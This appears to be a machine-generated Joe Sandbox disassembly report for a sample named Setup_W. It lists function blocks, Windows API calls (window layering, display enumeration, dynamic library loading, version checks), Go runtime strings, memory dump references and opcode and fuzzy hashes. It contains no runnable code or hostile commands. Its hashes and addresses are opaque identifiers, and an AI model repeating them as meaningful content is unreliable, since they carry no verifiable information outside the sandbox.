                                                                                                • Opcode ID: 10a3dd7ca98561c705222fd88babd9a87f93af03a2b099b42f0238ef1699d099
                                                                                                • Instruction ID: e9857d6c81e66214a173a1493ea557c90cea33299e3cb8046c12e10172541d74
                                                                                                • Opcode Fuzzy Hash: 10a3dd7ca98561c705222fd88babd9a87f93af03a2b099b42f0238ef1699d099
                                                                                                • Instruction Fuzzy Hash: 9B412BB0518781DFEB16DF6ACA8076AB7F4EB56B04F01A41CE48493608E7B5C884DF5A
                                                                                                APIs
                                                                                                  • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
                                                                                                  • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
                                                                                                  • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
                                                                                                  • Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765
                                                                                                • CreateRectRgn.GDI32(00000000), ref: 6460B90B
                                                                                                • GetWindowLongW.USER32 ref: 6460B95B
                                                                                                • SetWindowLongW.USER32 ref: 6460B97D
                                                                                                • SetLayeredWindowAttributes.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6460B9A7
                                                                                                • DeleteObject.GDI32 ref: 6460B9B3
                                                                                                • GetWindowLongW.USER32(00000000), ref: 6460B9CD
                                                                                                • SetWindowLongW.USER32 ref: 6460B9EF
                                                                                                • RedrawWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6460C8D5,00000000,00000000), ref: 6460BA19
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Long$ConditionMask$AttributesCreateDeleteInfoLayeredObjectRectRedrawVerifyVersion
                                                                                                • String ID:
                                                                                                • API String ID: 612219794-0
                                                                                                • Opcode ID: 5d7e6b9cc34daab646a0d86b1bc3fc4d1a29992f629cdd476340fd9e23b7a474
                                                                                                • Instruction ID: 44e4981ab1a89db8cfa399fa1c146b8c8643086fc116cd7b941efe6b6b07ab75
                                                                                                • Opcode Fuzzy Hash: 5d7e6b9cc34daab646a0d86b1bc3fc4d1a29992f629cdd476340fd9e23b7a474
                                                                                                • Instruction Fuzzy Hash: A541C8B1509706DFDB10AF69C64879EBBF4EF45725F00CA2CE8A88B281DB749444CF52
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Dragfree$Querycalloc$ByteCharFileFinishMultiPointWide
                                                                                                • String ID:
                                                                                                • API String ID: 1836115470-0
                                                                                                • Opcode ID: b9272abd13468555675f69898f664f5edb0311e9bfe2851c4a022eed4932d34f
                                                                                                • Instruction ID: 21f17271d0a1d0e5aecf1946cead42c5bd2f030e09ed4893c2bcaf0234a1ece6
                                                                                                • Opcode Fuzzy Hash: b9272abd13468555675f69898f664f5edb0311e9bfe2851c4a022eed4932d34f
                                                                                                • Instruction Fuzzy Hash: DF3168B4908704DFDB04EFA9C58869EFBF4FF89704F01891EE4989B250DB3498859B46
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: wcstombs$malloc$_assertfree
                                                                                                • String ID:
                                                                                                • API String ID: 3121319774-0
                                                                                                • Opcode ID: d223843b4f0981c2eea8b4766b8890c5f573bf735871876db03f897de83d308e
                                                                                                • Instruction ID: 56ca28514d4b1eca7c89cc07d14b80c7523b2de6cc68beb86310f996ff092ddc
                                                                                                • Opcode Fuzzy Hash: d223843b4f0981c2eea8b4766b8890c5f573bf735871876db03f897de83d308e
                                                                                                • Instruction Fuzzy Hash: DA11DDB440C7049FD300EF29C08469EFBF1EF8A654F11CA2EE59887350D7759489DB96
                                                                                                Strings
                                                                                                • bad g0 stackbad recoverycaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertracegetaddrinfowglfw: %s: %sharddecommithost is downhttp2debug=1http2deb, xrefs: 009C37AA
                                                                                                • CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writeclock: QueryPerformanceCounter failed: errno: %dcould not find GetSystemTimeAsFileTime() syscallfail to read symbol table: %d aux symbols unreadgraphicscommand: the, xrefs: 009C3860
                                                                                                • : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another, xrefs: 009C3887
                                                                                                • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another goroutineunsafe.String: ptr is nil and len i, xrefs: 009C382C
                                                                                                • VirtualQuery for stack base failedadding nil Certificate to CertPool : invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerforEachP: sched.safePointWait != 0frame_settings_window_size_too_bigframe_windowupdate_zer, xrefs: 009C3805
                                                                                                • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftservice unavailableskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown certificateunknown hash value unknown wait , xrefs: 009C373B
                                                                                                • : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptoo many Additionals to pack (>65535)too many Authorities to pack (>65535)t, xrefs: 009C38BB
                                                                                                • %, xrefs: 009C38C4
                                                                                                • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 009C37D1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2012483524.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2012469084.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012633658.0000000000BE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012633658.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012788116.0000000000E57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012802441.0000000000E60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012844036.0000000000F03000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012855315.0000000000F05000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012866010.0000000000F06000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012876851.0000000000F07000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012888016.0000000000F08000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012899101.0000000000F0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012899101.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012899101.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012899101.0000000000F33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012899101.0000000000F37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012957027.0000000000F3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012968805.0000000000F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012968805.0000000000F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_990000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another$ : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptoo many Additionals to pack (>65535)too many Authorities to pack (>65535)t$%$CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writeclock: QueryPerformanceCounter failed: errno: %dcould not find GetSystemTimeAsFileTime() syscallfail to read symbol table: %d aux symbols unreadgraphicscommand: the$VirtualQuery for stack base failedadding nil Certificate to CertPool : invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerforEachP: sched.safePointWait != 0frame_settings_window_size_too_bigframe_windowupdate_zer$bad g0 stackbad recoverycaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertracegetaddrinfowglfw: %s: %sharddecommithost is downhttp2debug=1http2deb$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another goroutineunsafe.String: ptr is nil and len i$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftservice unavailableskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown certificateunknown hash value unknown wait
                                                                                                • API String ID: 0-3256493565
                                                                                                • Opcode ID: 6f4e1f2d640cd9b8e3e1593d8ec1e039d40b1190389c5a7723dc0dc2770d489d
                                                                                                • Instruction ID: c697bafc0353355befbb81eae5209afef794e9a2bcd0f42526a538a52c226626
                                                                                                • Opcode Fuzzy Hash: 6f4e1f2d640cd9b8e3e1593d8ec1e039d40b1190389c5a7723dc0dc2770d489d
                                                                                                • Instruction Fuzzy Hash: 2C81BFB49087418FD340EF64C199B5EBBE4AF88744F00892DF4989B352DB78DA498F53
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,64606DDE), ref: 64606BEC
                                                                                                • GetProcAddress.KERNEL32 ref: 64606C29
                                                                                                  • Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
                                                                                                  • Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProccallocstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 3191970723-0
                                                                                                • Opcode ID: 6d21702410a0b7366d64fda7284359eda90acc1b2dcf1eb05de0a7ddf4f8dc4e
                                                                                                • Instruction ID: f0646acfb52e7e7914e8e69514eb6b0ed57cf7e0ba1799fa8941cc7d4de1ebcc
                                                                                                • Opcode Fuzzy Hash: 6d21702410a0b7366d64fda7284359eda90acc1b2dcf1eb05de0a7ddf4f8dc4e
                                                                                                • Instruction Fuzzy Hash: B04118B090C3519BD716AF65D64439EBBF4EF66B48F01E85EE8848B240D77988C4CB53
                                                                                                APIs
                                                                                                • VerSetConditionMask.KERNEL32 ref: 6460870F
                                                                                                • VerSetConditionMask.KERNEL32 ref: 6460872B
                                                                                                • VerSetConditionMask.KERNEL32 ref: 64608747
                                                                                                • RtlVerifyVersionInfo.NTDLL ref: 64608765
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConditionMask$InfoVerifyVersion
                                                                                                • String ID: $#
                                                                                                • API String ID: 2793162063-2491617062
                                                                                                • Opcode ID: 7dee0b40ec2958011d88d923daa984bfca8fb5401a2ecf77b084f30c4cbb9e4c
                                                                                                • Instruction ID: 8ac03f99b4996b812ac9ca3971312d0a604f99c29dc6038d0a7191f675425ea0
                                                                                                • Opcode Fuzzy Hash: 7dee0b40ec2958011d88d923daa984bfca8fb5401a2ecf77b084f30c4cbb9e4c
                                                                                                • Instruction Fuzzy Hash: 6011DAB08083089FDB10AF69C5493AEBBF4EF88354F00C85DE89887281E3B99554CF82
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcmp
                                                                                                • String ID:
                                                                                                • API String ID: 1475443563-0
                                                                                                • Opcode ID: 2e52f2b98325dc52c0b51982dec49706dfa811e7d710c57d7612a5bbb7f5f683
                                                                                                • Instruction ID: df5c36a09866d2bcf33a00dd3babb0bf3a192e59e48267d6dc1dba8cacacb17f
                                                                                                • Opcode Fuzzy Hash: 2e52f2b98325dc52c0b51982dec49706dfa811e7d710c57d7612a5bbb7f5f683
                                                                                                • Instruction Fuzzy Hash: 8551F5B0A08745DBEB05DF19C68479ABFF1EF95748F00C81DE8988B294E374D489DB82
                                                                                                APIs
                                                                                                • calloc.MSVCRT ref: 6460A359
                                                                                                  • Part of subcall function 64609F84: EnumDisplaySettingsW.USER32 ref: 64609FF5
                                                                                                  • Part of subcall function 64609F84: CreateDCW.GDI32 ref: 6460A01F
                                                                                                  • Part of subcall function 64609F84: GetDeviceCaps.GDI32 ref: 6460A05B
                                                                                                  • Part of subcall function 64609F84: GetDeviceCaps.GDI32 ref: 6460A070
                                                                                                  • Part of subcall function 64609F84: DeleteDC.GDI32 ref: 6460A164
                                                                                                  • Part of subcall function 64609F84: free.MSVCRT ref: 6460A186
                                                                                                  • Part of subcall function 64609F84: wcscpy.MSVCRT ref: 6460A1B4
                                                                                                  • Part of subcall function 64609F84: WideCharToMultiByte.KERNEL32(00000000), ref: 6460A202
                                                                                                • EnumDisplayDevicesW.USER32 ref: 6460A3B9
                                                                                                • EnumDisplayDevicesW.USER32 ref: 6460A41F
                                                                                                • wcscmp.MSVCRT ref: 6460A469
                                                                                                • wcscmp.MSVCRT ref: 6460A4ED
                                                                                                • free.MSVCRT ref: 6460A565
                                                                                                  • Part of subcall function 646057C8: realloc.MSVCRT ref: 646057FC
                                                                                                  • Part of subcall function 646057C8: memmove.MSVCRT ref: 64605825
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: DisplayEnum$CapsDeviceDevicesfreewcscmp$ByteCharCreateDeleteMultiSettingsWidecallocmemmovereallocwcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 579719053-0
                                                                                                • Opcode ID: 9917d3392d3a617b4d7d2ab2030af2b87a8db3f159270d7fa2b6180cf961cf81
                                                                                                • Instruction ID: dcd89fd2c13b460c3e6eb5867185efa4242b4b2248a255bf9b5c91e267a74ee1
                                                                                                • Opcode Fuzzy Hash: 9917d3392d3a617b4d7d2ab2030af2b87a8db3f159270d7fa2b6180cf961cf81
                                                                                                • Instruction Fuzzy Hash: A9514EB19083158FEB15DF28C94439EBBF5BFA5784F00C8ADD888A7200E776D9958F42
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassDestroyIconLongMetricsSystem
                                                                                                • String ID:
                                                                                                • API String ID: 902249451-0
                                                                                                • Opcode ID: ab1f1fc866288ddce23ccd6ea3318ccb7c23821cc0cae89833419a73b4b51bfe
                                                                                                • Instruction ID: 713f0ba8414f9aa3487a0b640c95419bedf34daf1fda783aefc2163a129a0fcc
                                                                                                • Opcode Fuzzy Hash: ab1f1fc866288ddce23ccd6ea3318ccb7c23821cc0cae89833419a73b4b51bfe
                                                                                                • Instruction Fuzzy Hash: C8517A71A04205DFDB04EFA9C9486AEBBF9EF89710F01C529E898DB390DB789841CF51
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(?,?,?,646012C1,?,?,?,?,?,?,646013D3), ref: 64601057
                                                                                                • _amsg_exit.MSVCRT ref: 64601085
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep_amsg_exit
                                                                                                • String ID:
                                                                                                • API String ID: 1015461914-0
                                                                                                • Opcode ID: 40c6d0a2b95b52d6a4fe3d8224c7018e8a76ef40fb9e2947438d67cfd26b18a5
                                                                                                • Instruction ID: d62b50c69b97806eec955e296aaed03516669fdb76f59aa6d42e2eb3e52d9b3f
                                                                                                • Opcode Fuzzy Hash: 40c6d0a2b95b52d6a4fe3d8224c7018e8a76ef40fb9e2947438d67cfd26b18a5
                                                                                                • Instruction Fuzzy Hash: 03418F7164C290CBE716EF5AC68139B7BA0EB66748F40C52DE4848B241DB77C580CBD2
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$calloc
                                                                                                • String ID: $
                                                                                                • API String ID: 3095843317-227171996
                                                                                                • Opcode ID: fff1826f8f0f02b24e857272bbaad84b7210f0ba0c4f2043c4bad887d9e7d85c
                                                                                                • Instruction ID: 37b25af67d1840a2031605d6addd8f798cfa9e2af2e1ac235572a749ba1644fb
                                                                                                • Opcode Fuzzy Hash: fff1826f8f0f02b24e857272bbaad84b7210f0ba0c4f2043c4bad887d9e7d85c
                                                                                                • Instruction Fuzzy Hash: 7041E870908718CFDB65DF29C9847D9BBF1EB89708F0088A9D59C97250D7759A88CF82
                                                                                                APIs
                                                                                                • GetCursorPos.USER32 ref: 6460B4B8
                                                                                                • WindowFromPoint.USER32(64633B20,?,?,?,?,?,?,?,?,?,?,?,?,64633B20,?,6460E287), ref: 6460B4D4
                                                                                                • GetClientRect.USER32 ref: 6460B4EE
                                                                                                • ClientToScreen.USER32(00000000,00000000), ref: 6460B509
                                                                                                • ClientToScreen.USER32 ref: 6460B51D
                                                                                                • PtInRect.USER32 ref: 6460B532
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
